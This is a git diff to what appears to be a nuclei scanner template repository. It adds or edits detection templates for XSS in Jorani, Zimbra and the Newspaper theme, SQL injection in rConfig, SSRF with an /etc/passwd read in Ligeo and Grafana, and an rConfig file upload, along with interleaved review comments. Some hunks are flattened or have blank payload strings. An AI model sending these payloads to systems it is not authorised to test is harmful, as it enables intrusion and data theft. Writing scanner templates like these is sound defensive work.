diff --git a/.new-additions b/.new-additions
index 4842155e806..f8e33bf79fa 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,6 +1,9 @@
 http/cnvd/2021/CNVD-2021-32799.yaml
 http/cves/2016/CVE-2016-10108.yaml
+http/cves/2018/CVE-2018-15917.yaml
+http/cves/2020/CVE-2020-10220.yaml
 http/cves/2020/CVE-2020-11798.yaml
+http/cves/2021/CVE-2021-46107.yaml
 http/cves/2022/CVE-2022-22897.yaml
 http/cves/2023/CVE-2023-20073.yaml
 http/cves/2023/CVE-2023-26469.yaml
@@ -8,6 +11,7 @@ http/cves/2023/CVE-2023-27034.yaml
 http/cves/2023/CVE-2023-30150.yaml
 http/cves/2023/CVE-2023-32563.yaml
 http/cves/2023/CVE-2023-34124.yaml
+http/cves/2023/CVE-2023-34192.yaml
 http/cves/2023/CVE-2023-36844.yaml
 http/exposed-panels/aspcms-backend-panel.yaml
 http/exposed-panels/greenbone-panel.yaml
diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt
index f15ec04e09e..3b5ab14de2a 100644
--- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt
+++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt
@@ -1 +1 @@
-4.4.4
\ No newline at end of file
+4.4.5.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/better-wp-security.txt b/helpers/wordpress/plugins/better-wp-security.txt
index 5f82703f924..1c61cc5bd96 100644
--- a/helpers/wordpress/plugins/better-wp-security.txt
+++ b/helpers/wordpress/plugins/better-wp-security.txt
@@ -1 +1 @@
-8.1.7
\ No newline at end of file
+8.1.8
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/broken-link-checker.txt b/helpers/wordpress/plugins/broken-link-checker.txt
index fae692e41d4..7e541aec69b 100644
--- a/helpers/wordpress/plugins/broken-link-checker.txt
+++ b/helpers/wordpress/plugins/broken-link-checker.txt
@@ -1 +1 @@
-2.2.1
\ No newline at end of file
+2.2.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt
index 6ebad148881..711ee4f504a 100644
--- a/helpers/wordpress/plugins/cookie-law-info.txt
+++ b/helpers/wordpress/plugins/cookie-law-info.txt
@@ -1 +1 @@
-3.1.2
\ No newline at end of file
+3.1.3
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/loco-translate.txt b/helpers/wordpress/plugins/loco-translate.txt
index e46a05b1967..68167133b95 100644
--- a/helpers/wordpress/plugins/loco-translate.txt
+++ b/helpers/wordpress/plugins/loco-translate.txt
@@ -1 +1 @@
-2.6.4
\ No newline at end of file
+2.6.5
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/maintenance.txt b/helpers/wordpress/plugins/maintenance.txt
index 109b44a452d..497104f6201 100644
--- a/helpers/wordpress/plugins/maintenance.txt
+++ b/helpers/wordpress/plugins/maintenance.txt
@@ -1 +1 @@
-4.07
\ No newline at end of file
+4.08
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/ml-slider.txt b/helpers/wordpress/plugins/ml-slider.txt
index ebb8439a9bb..0dc31e89d8c 100644
--- a/helpers/wordpress/plugins/ml-slider.txt
+++ b/helpers/wordpress/plugins/ml-slider.txt
@@ -1 +1 @@
-3.36.0
\ No newline at end of file
+3.37.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt
index f9da12e1184..c0be8a7992a 100644
--- a/helpers/wordpress/plugins/woocommerce-payments.txt
+++ b/helpers/wordpress/plugins/woocommerce-payments.txt
@@ -1 +1 @@
-6.3.2
\ No newline at end of file
+6.4.0
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml
new file mode 100644
index 00000000000..0cee8304d1b
--- /dev/null
+++ b/http/cves/2018/CVE-2018-15917.yaml
@@ -0,0 +1,50 @@
+id: CVE-2018-15917
+
+info:
+ name: Jorani Leave Management System 0.6.5 - Cross-Site Scripting
+ author: ritikchaddha
+ severity: medium
+ description: |
+ Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.
+ reference:
+ - https://www.exploit-db.com/exploits/45338
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-15917
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2018-15917
+ cwe-id: CWE-79
+ metadata:
+ max-request: 2
+ verified: true
+ shodan-query: title:"Login - Jorani"
+ tags: cve,cve2018,jorani,xss
+
+http:
+ - raw:
+ - |
+ GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /session/login HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+ - '_jorani'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml
new file mode 100644
index 00000000000..860bb427fd0
--- /dev/null
+++ b/http/cves/2020/CVE-2020-10220.yaml
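Review bot: The first entry under `words:` in the body matcher appears as an empty string on this page (it may have been lost in rendering); if that is what was committed, an empty word matches any body and the detection reduces to `_jorani` plus `text/html` plus 200, which would presumably report every reachable Jorani login page as vulnerable. That entry should hold the exact unencoded marker sent in the first request, so that a hit shows the value came back unescaped. The three matchers are also not tied to the second response; pinning them with `part: body_2` and `part: header_2`, as the Zimbra template in this same commit does, would document that the stored value is checked on `/session/login`.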
@@ -0,0 +1,41 @@ +id: CVE-2020-10220 + +info: + name: rConfig 3.9 - SQL injection + author: ritikchaddha + severity: critical + description: | + An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter. + reference: + - http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-10220 + classification: + cve-id: CVE-2020-10220 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + shodan-query: title:"rConfig" + tags: cve,cve2020,rconfig,sqli + +variables: + num: "999999999" + +http: + - raw: + - | + GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index ffe2cb9506b..b6f06735253 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -18,21 +18,23 @@ info: cvss-score: 8.2 cve-id: CVE-2020-13379 cwe-id: CWE-918 - epss-score: 0.16322 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + epss-score: 0.16322 metadata: - max-request: 1 + max-request: 2 + product: grafana shodan-query: title:"Grafana" - verified: true vendor: grafana - product: grafana + verified: true tags: cve,cve2020,grafana,ssrf http: - method: GET path: - "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" + - "{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" + stop-at-first-match: true matchers-condition: and matchers: - type: word 
diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml
new file mode 100644
index 00000000000..466d24fa8a6
--- /dev/null
+++ b/http/cves/2021/CVE-2021-46107.yaml
@@ -0,0 +1,42 @@
+id: CVE-2021-46107
+
+info:
+ name: Ligeo Archives Ligeo Basics - Server Side Request Forgery
+ author: ritikchaddha
+ severity: high
+ description: |
+ Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features.
+ reference:
+ - https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-46107
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-46107
+ cwe-id: CWE-918
+ metadata:
+ fofa-query: title="Ligeo"
+ max-request: 3
+ shodan-query: title:"Ligeo"
+ verified: true
+ tags: cve,cve2021,ligeo,ssrf,lfr
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /archive/download?file=file:///etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')"
+ - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"
diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml
index 0485651b64e..f4d9a59974a 100644
--- a/http/cves/2022/CVE-2022-2627.yaml
+++ b/http/cves/2022/CVE-2022-2627.yaml
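Review bot: The two `dsl` entries in the CVE-2021-46107 matcher are alternatives, but nothing in the template says so; the OR is only the engine's default for a list of expressions. Adding `condition: or` next to `dsl:` together with a comment such as `# request 2 proves a local file read, request 3 proves an out-of-band HTTP fetch; both are gated on the Ligeo fingerprint from request 1` would make the intent explicit for the next editor and guard against someone later adding a third expression under the assumption that the list is AND-ed.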
@@ -1,11 +1,12 @@ id: CVE-2022-2627 info: - name: WordPress Newspaper <12 - Cross-Site Scripting - author: ramondunker + name: WordPress Newspaper < 12 - Cross-Site Scripting + author: ramondunker,c4sper0 severity: medium description: | WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. + remediation: Fixed in version 12 reference: - https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea - https://nvd.nist.gov/vuln/detail/CVE-2022-2627 @@ -18,6 +19,8 @@ info: cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + verified: true + publicwww-query: "/wp-content/themes/Newspaper" framework: wordpress vendor: tagdiv product: newspaper @@ -26,19 +29,23 @@ info: http: - raw: - | - POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/2 + POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1 Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - action=td_ajax_search&td_string=tej2j1q%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3emvufr + action=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]= + + payloads: + xss_payload: + - "
" matchers-condition: and matchers: - type: word part: body words: - - '' - - '/newspaper' - case-insensitive: true + -
+ - td-block- condition: and - type: word diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml new file mode 100644 index 00000000000..d497b6c3e9d --- /dev/null +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -0,0 +1,52 @@ +id: CVE-2023-34192 + +info: + name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting + author: ritikchaddha + severity: high + description: | + Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function. + reference: + - https://mp.weixin.qq.com/s/Vz8yL4xBlZN5EQQ_BG0OOA + - https://www.helpnetsecurity.com/2023/07/17/cve-2023-34192/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-34192 + classification: + cve-id: CVE-2023-34192 + metadata: + fofa-query: icon_hash="475145467" + max-request: 2 + shodan-query: http.favicon.hash:475145467 + tags: cve,cve2023,zimbra,xss,authenticated + +http: + - raw: + - | + POST /zimbra/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginOp=login&username={{username}}&password={{password}}&client=preferred + + - | + GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "" + - "zimbra" + condition: and + + - type: word + part: header_2 + words: + - text/html + + - type: status + part: header_2 + status: + - 200 diff --git a/http/miscellaneous/apple-app-site-association.yaml b/http/miscellaneous/apple-app-site-association.yaml index e121f492a92..ba827693c1b 100644 --- a/http/miscellaneous/apple-app-site-association.yaml +++ b/http/miscellaneous/apple-app-site-association.yaml @@ -34,3 +34,8 @@ http: - type: status status: - 200 + + extractors: + - type: json + json: + - .applinks.details[].appID \ No newline at end of file 
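Review bot: On the status matcher of CVE-2023-34192.yaml, `part: header_2` does not do what it suggests: as far as I know the status matcher type compares the response status code and ignores `part`, so this check is not pinned to the second request the way the two word matchers are. A DSL matcher states it directly, `- type: dsl` with `dsl: ["status_code_2 == 200"]`. The outcome of the login request is never checked either, so wrong credentials yield a silent negative rather than an error. `classification` carries no `cvss-metrics`, `cvss-score` or `cwe-id` to back `severity: high`, unlike the other new templates in this commit. The first `words:` entry also renders as an empty string on this page; if that is what was committed, the body check reduces to the word `zimbra`.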
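Review bot: The extractor added to apple-app-site-association.yaml reads only `.applinks.details[].appID`, so association files in the newer layout, where each `details` entry carries an `appIDs` array instead of a single `appID`, would produce no extracted value. A second expression, `- .applinks.details[].appIDs[]?`, covers both layouts; the trailing `?` keeps entries without that key from raising an error. The file now also ends without a trailing newline.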
diff --git a/http/vulnerabilities/other/rconfig-file-upload.yaml b/http/vulnerabilities/other/rconfig-file-upload.yaml index 3604834e617..b3635e1d8ac 100644 --- a/http/vulnerabilities/other/rconfig-file-upload.yaml +++ b/http/vulnerabilities/other/rconfig-file-upload.yaml @@ -1,20 +1,23 @@ -id: rconfig-rce +id: rconfig-file-upload info: name: rConfig 3.9.5 - Arbitrary File Upload author: dwisiswant0 severity: high - description: rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + description: | + rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.5.zip + - https://www.exploit-db.com/exploits/48878 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cwe-id: CWE-434 - reference: - - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - - https://www.exploit-db.com/exploits/48878 - tags: rconfig,rce,edb metadata: max-request: 1 + shodan-query: title:"rConfig" + verified: true + tags: rconfig,rce,edb,file-upload,instrusive http: - raw: diff --git a/templates-checksum.txt b/templates-checksum.txt index 146ee08a5fe..f7531e1a1fc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt 
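Review bot: In the new `tags:` line of rconfig-file-upload.yaml the last tag is spelled `instrusive`, so scans that include or exclude templates by the `intrusive` tag will not see this file-upload template, which defeats the purpose of adding it. It should read `tags: rconfig,rce,edb,file-upload,intrusive`. The `id` also changes from `rconfig-rce` to `rconfig-file-upload`, so any saved exclusion list or workflow that refers to the old id would presumably stop matching; that deserves a line in the commit message. The request body of the template lies outside this hunk.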
@@ -367,7 +367,7 @@ helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7d helpers/wordpress/plugins/advanced-custom-fields.txt:358a36934535cdb0f43c2bd34f8032939c89dee3 helpers/wordpress/plugins/akismet.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f -helpers/wordpress/plugins/all-in-one-seo-pack.txt:5e3c54ec1686b257c15fe3bd98af9e08d983b8ab +helpers/wordpress/plugins/all-in-one-seo-pack.txt:bf1d607adfeedd476ba3e3fba79a756e25035222 helpers/wordpress/plugins/all-in-one-wp-migration.txt:addf63c8a9f97e52b5b7aca6dc435f3680b17d2a helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59f helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57 
@@ -377,11 +377,11 @@ helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a helpers/wordpress/plugins/autoptimize.txt:661ae89c9a4b16c450c2a094d410c4ee74719cb3 helpers/wordpress/plugins/backwpup.txt:063ee00ca80d81e068dd404b59ceb2a03b2e7109 helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/better-wp-security.txt:c54fa79bac14562d677ca2be716dc363653d1cd4 +helpers/wordpress/plugins/better-wp-security.txt:ddc49152d337977df228a63c029f8c815c822ce2 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/breadcrumb-navxt.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b helpers/wordpress/plugins/breeze.txt:7277d832c4a280d1c4cd0f4bf3169bf93d46d49e -helpers/wordpress/plugins/broken-link-checker.txt:bf64dd8c92190417a38d834b0c92eee4be757761 +helpers/wordpress/plugins/broken-link-checker.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/child-theme-configurator.txt:8e805063c85859847271163a1c51e5865e460aea helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 
@@ -395,7 +395,7 @@ helpers/wordpress/plugins/complianz-gdpr.txt:b12395a5190cbd66359bb94c3f32f0635e3 helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/contact-form-7.txt:77526ddfb1469f41739fcab554059141c36d9329 helpers/wordpress/plugins/contact-form-cfdb7.txt:c6802dfc6ada46af8820db93c237d00787bd441c -helpers/wordpress/plugins/cookie-law-info.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 +helpers/wordpress/plugins/cookie-law-info.txt:049a35ad82b9c914dc50f602563d1e37e06ef9a6 helpers/wordpress/plugins/cookie-notice.txt:6b67ce6c1930ff8e1d5003aeb8218f8fbdd4e6d2 helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:5c09cf3589e93781df4d59ed6b5a5d6207e2929c 
@@ -458,19 +458,19 @@ helpers/wordpress/plugins/leadin.txt:4ea6749184af2616dda4c6d36597b267338ca299 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:eb7b3babdf22a684d0ea8660470e63f0a4a6f2d6 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:a2246273db175b4d951c8ae09a9b87d55b422463 -helpers/wordpress/plugins/loco-translate.txt:5f099bc6f95ad230bf3e17b9745270e13ee50606 +helpers/wordpress/plugins/loco-translate.txt:c1c423f2f1813573ad1b704e4b6aea927ed8deb9 helpers/wordpress/plugins/loginizer.txt:9829113ed356f261f9202f78259f32919e9e5d9b helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:d962fd9a839a218de0c95dddb4f7e937cdd40d38 helpers/wordpress/plugins/mailpoet.txt:4e0e9b8af035e0887466f99581b3657149805e2c -helpers/wordpress/plugins/maintenance.txt:254b136ca21ea7ce53096fd367ddb29c22a7cce9 +helpers/wordpress/plugins/maintenance.txt:676c72a3610df638213dbd14937d1a1d3541b924 helpers/wordpress/plugins/mainwp-child.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e helpers/wordpress/plugins/malcare-security.txt:110e72e19320b384e7459b22647e5acdb0255c57 helpers/wordpress/plugins/megamenu.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 helpers/wordpress/plugins/members.txt:237c8767860dc44f0f30057d25e9143e3d0b425f helpers/wordpress/plugins/meta-box.txt:1f35081e09d2a2ed9d9cb39777ed8121a68d0cee -helpers/wordpress/plugins/ml-slider.txt:32f71be2b08c58a10d49f26fdb35bf06c8f20122 +helpers/wordpress/plugins/ml-slider.txt:f6b24d20fb8ca8547810ce73f202e02919d356e0 helpers/wordpress/plugins/newsletter.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655 helpers/wordpress/plugins/nextgen-gallery.txt:f2cc8874a54d8d40b341d84839c1b2984efc0aba 
@@ -536,7 +536,7 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:381bb12da04a82580bb6 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:85e58fba8dcfa56b29939775178a4af11946316b -helpers/wordpress/plugins/woocommerce-payments.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6 +helpers/wordpress/plugins/woocommerce-payments.txt:f761ee50908e2e01cb058b4b2f46366c4d288e93 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:cc1586242918f22469f32e7d30bae9a88f411c48 helpers/wordpress/plugins/woocommerce-services.txt:7cfe54f27289e2e996bf2e77df14202ff94111f9 @@ -1120,6 +1120,7 @@ http/cves/2018/CVE-2018-15138.yaml:36f31a268f34ecb7d3bc9dbb8780a3331a0a85a0 http/cves/2018/CVE-2018-15517.yaml:630aa932c228a3d5ab7535ce105b7221c784375f http/cves/2018/CVE-2018-15535.yaml:5a976b8f0b17f4042a90bde5f49012c04bd0ee9a http/cves/2018/CVE-2018-15745.yaml:367ddf7a4c089a1476fe48716e69e9b0e8594190 +http/cves/2018/CVE-2018-15917.yaml:ea9408feec6802710f83f0e55caeec4aa7652fb9 http/cves/2018/CVE-2018-15961.yaml:cb650b9eb6d6106d7fdd8ee6d9caf616396c0339 http/cves/2018/CVE-2018-16059.yaml:346b58eb5f9f9828c0a43fe5de951bef08d6f84e http/cves/2018/CVE-2018-16133.yaml:887665262f6debceddc70e7f66ca2bb21a791555 
@@ -1378,6 +1379,7 @@ http/cves/2019/CVE-2019-9978.yaml:29fa05916d940a02b2052750609450962d826369 http/cves/2020/CVE-2020-0618.yaml:fb8a86443513fb8dfb8bfd4ef48846be61fbd046 http/cves/2020/CVE-2020-10148.yaml:785c887c894285e141a8c3ec6d81dbf0ca321825 http/cves/2020/CVE-2020-10199.yaml:148ba582f0b0a858b2974d29715f40352211ead0 +http/cves/2020/CVE-2020-10220.yaml:d4198c17d90c22e291f9ffcf41aa5838efcb3b70 http/cves/2020/CVE-2020-10546.yaml:064a059d47a385fd83a9b1b62793b5891e9e5b07 http/cves/2020/CVE-2020-10547.yaml:58b39f2460d859c96b62ab0697151b9d6334808e http/cves/2020/CVE-2020-10548.yaml:379ae6d4c78187bc1e20dcf6ec9fb27ede275db3 @@ -1412,7 +1414,7 @@ http/cves/2020/CVE-2020-13121.yaml:9dc7b16d238c0f459e1c859af2eee995a490a654 http/cves/2020/CVE-2020-13158.yaml:f62235f5a3b204038b3da15490ab9114643183b8 http/cves/2020/CVE-2020-13167.yaml:65c3c0a11291c74e4ccb4e0b79ed0957d0a8de7c http/cves/2020/CVE-2020-13258.yaml:aa3db4375fb4584fac99169f08ac1cda299855f3 -http/cves/2020/CVE-2020-13379.yaml:4c62c2dda3258e27300b0607a29312d19622297d +http/cves/2020/CVE-2020-13379.yaml:05f9450e2fd21df27c555b164451a4c25a308a68 http/cves/2020/CVE-2020-13405.yaml:364c8a655d463164f79a3da5c045565d4fa9ff57 http/cves/2020/CVE-2020-13483.yaml:34af617d306d7bf273b42a8056f5025cd910a442 http/cves/2020/CVE-2020-13700.yaml:1a7bc8e4b8c9e42c098330b55f7f2365e48c71ca @@ -2031,6 +2033,7 @@ http/cves/2021/CVE-2021-46069.yaml:4a66853e90d99951c71c877bb4f3912ad58d21ca http/cves/2021/CVE-2021-46071.yaml:e72f5409191f3fdcf79c20316aa900616aea5d91 http/cves/2021/CVE-2021-46072.yaml:a2b12e554f7f5713084305bf3f5a005a43dc0cd4 http/cves/2021/CVE-2021-46073.yaml:b3b6ebe4a5cad18f2900529a17d133cbcc048238 +http/cves/2021/CVE-2021-46107.yaml:a1658d92714c11c9665ff45882cb7458bb5f4f8c http/cves/2021/CVE-2021-46379.yaml:9cef057ba92e93d700d00e0a80569c02278c6cd6 http/cves/2021/CVE-2021-46381.yaml:55315c21c062982a73fcf7ef3b843e59c25f6953 http/cves/2021/CVE-2021-46387.yaml:224cf815250e716166a2f1a7abce55b048ab93a6 
@@ -2233,7 +2236,7 @@ http/cves/2022/CVE-2022-26148.yaml:3d63c3c54ccceebb6834e30ac08e30ba14cabeea http/cves/2022/CVE-2022-26159.yaml:3b77229394b437c585c570e3253c1f56690a2bb5 http/cves/2022/CVE-2022-26233.yaml:bf0b2d1e3cc09228bb8fa9cdedf39d425dd73adc http/cves/2022/CVE-2022-26263.yaml:28ef01e032bc2a5fe99e8de5677f4350b711d1e7 -http/cves/2022/CVE-2022-2627.yaml:f77c674bb02e26f164b54012aaadd31242e72d30 +http/cves/2022/CVE-2022-2627.yaml:d026b886c144d021596fa224edc521639a3c4a05 http/cves/2022/CVE-2022-2633.yaml:eb0d6e871e026e54ea530a19ee544c7523a43515 http/cves/2022/CVE-2022-26352.yaml:117ad67580f651f62733b47d50fd68de369bacbe http/cves/2022/CVE-2022-26564.yaml:48eeb6c3f3af813ff7f60114e697000288d5e80d @@ -2591,6 +2594,7 @@ http/cves/2023/CVE-2023-3345.yaml:81aa4e514ec7e42c0c04e9525c0a07dc2023e301 http/cves/2023/CVE-2023-33510.yaml:2c13c6f56ab0416bdd7e53d28814a6f565302605 http/cves/2023/CVE-2023-33568.yaml:eb301b833721e18854829e2af5f33287788bd00e http/cves/2023/CVE-2023-34124.yaml:bb268f4fb1c4909a6897e8275b1f5f60fcb8886f +http/cves/2023/CVE-2023-34192.yaml:8affac232592b125b819252a29ac21b5e6f40b05 http/cves/2023/CVE-2023-34362.yaml:c3e8ebce7d7e6d851ee37989c43faa13f3fb8c82 http/cves/2023/CVE-2023-34537.yaml:961d0827d05c1234d0e00da2ed0ae49f08d0d9de http/cves/2023/CVE-2023-34598.yaml:e6d11470360f77660a6b9751e2a68c368fc03d29 
@@ -4220,7 +4224,7 @@ http/iot/webtools-home.yaml:8fac1b9a4c40b7a99a33895c75dcd2be623e1965 http/iot/xp-webcam.yaml:6a17a29da87ffe3b4a382c6ed2e4ca38c148e54e http/iot/zebra-printer-detect.yaml:3ac7d5f177a91a5ee89411ead8e073a72a10997e http/miscellaneous/addeventlistener-detect.yaml:49f913e72df50e18eb80458c9fbb5df10d4253b6 -http/miscellaneous/apple-app-site-association.yaml:c6da929223cda667179226cfba083fc9692c7dac +http/miscellaneous/apple-app-site-association.yaml:541c9e23a52f733b557f3e0a7edee2d9d66069b8 http/miscellaneous/aws-ecs-container-agent-tasks.yaml:e19643775ad6c43b074bc8773f31dce3dba3fd05 http/miscellaneous/clientaccesspolicy.yaml:d2ebcdf18a9e115d28ec5418618dde3de28439b6 http/miscellaneous/crypto-mining-malware.yaml:253d42ee74ffdb0947f1ec2df0ae4f2a5645bedb @@ -6575,7 +6579,7 @@ http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml:67 http/vulnerabilities/other/qihang-media-disclosure.yaml:dad6da0182625d9a95acdfec0df21b049c4daa8d http/vulnerabilities/other/qihang-media-lfi.yaml:3b581630106e3bd04f75366c9076ee8f1b8e8832 http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml:2382325fe062c56d0e35cc5384647750325f58dd -http/vulnerabilities/other/rconfig-file-upload.yaml:bb0dc040e78ff6d9e6208aae64bf290ece7641a4 +http/vulnerabilities/other/rconfig-file-upload.yaml:b69bd7f2506e74dc3031fd6c5c4bab47e3f7f7fe 